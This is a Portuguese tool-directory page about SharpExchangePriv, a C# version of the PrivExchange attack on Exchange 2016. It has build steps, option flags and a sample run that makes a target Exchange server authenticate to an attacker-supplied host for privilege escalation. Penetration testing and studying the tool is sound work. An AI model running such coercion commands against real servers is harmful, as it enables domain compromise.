Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SharpExchangePriv — Uma implementação em C# do PrivExchange por @_dirkjan. | Kitploit
Ferramentas/GitHubGitHub/panagioto/sharpexchangepriv
Escalada de PrivilégiosExploraçãoTestes de Penetração
GitHubpanagioto/sharpexchangepriv

SharpExchangePriv

Uma implementação em C# do PrivExchange por @_dirkjan.

Ver Repositório
15528há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SharpExchangePriv

Descrição

Uma implementação em C# do PrivExchange por @_dirkjan. Créditos ao @g0ldenGunSec, pois me apoiei no código dele.

Foi testado contra Exchange 2016.

Instruções de Compilação

SharpExchangePriv foi compilado para .NET 3.5 e é compatível com Visual Studio 2017. Basta abrir o arquivo de solução e compilar o projeto.

Usei o CommandLineParser para analisar os argumentos. Isso criará o arquivo CommandLine.dll, junto com o executável. Você pode simplesmente mesclar o .exe e o .dll em um único arquivo executável:

ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll

Uso

--targetHost

Defina o IP do host alvo.

--attackerHost

Defina o IP do atacante.

--attackerPort

Defina a porta do atacante.

--attackerPage

Defina a página do atacante.

--ssl

Ativar SSL.

--exchangeVersion

Defina a versão do Exchange, o padrão é 2016.

--exchangePort

Defina a porta alvo do Exchange.

Exemplo

root@kitploit:~
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
 /$$$$$$$           /$$            /$$$$$$$$                     /$$
| $$__  $$         |__/           | $$_____/                    | $$
| $$  \ $$ /$$$$$$  /$$ /$$    /$$| $$       /$$   /$$  /$$$$$$$| $$$$$$$   /$$$$$$  /$$$$$$$   /$$$$$$   /$$$$$$
| $$$$$$$//$$__  $$| $$|  $$  /$$/| $$$$$   |  $$ /$$/ /$$_____/| $$__  $$ |____  $$| $$__  $$ /$$__  $$ /$$__  $$
| $$____ /| $$  \__ /| $$ \  $$/$$/ | $$__ /    \  $$$$/ | $$      | $$  \ $$  /$$$$$$$| $$  \ $$| $$  \ $$| $$$$$$$$
| $$     | $$      | $$  \  $$$/  | $$        >$$  $$ | $$      | $$  | $$ /$$__  $$| $$  | $$| $$  | $$| $$_____ /
| $$     | $$      | $$   \  $/   | $$$$$$$$ /$$/\  $$|  $$$$$$$| $$  | $$|  $$$$$$$| $$  | $$|  $$$$$$$|  $$$$$$$
|__/     |__/      |__/    \_/    |________/|__/  \__/ \_______/|__/  |__/ \_______/|__/  |__/ \____  $$ \_______/
                                                                                               /$$  \ $$
                                                                                              |  $$$$$$/
                                                                                               \______ /
                                                                                                            @den_n1s

The target URL is https://192.168.11.10:443/EWS/Exchange.asmx

Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx

HTTP 200 response received, the target Exchange server should be authenticating shortly.

Contato

Por favor, reporte quaisquer bugs na página do projeto no Github ou me chame no twitter @den_n1s

Baixar ferramenta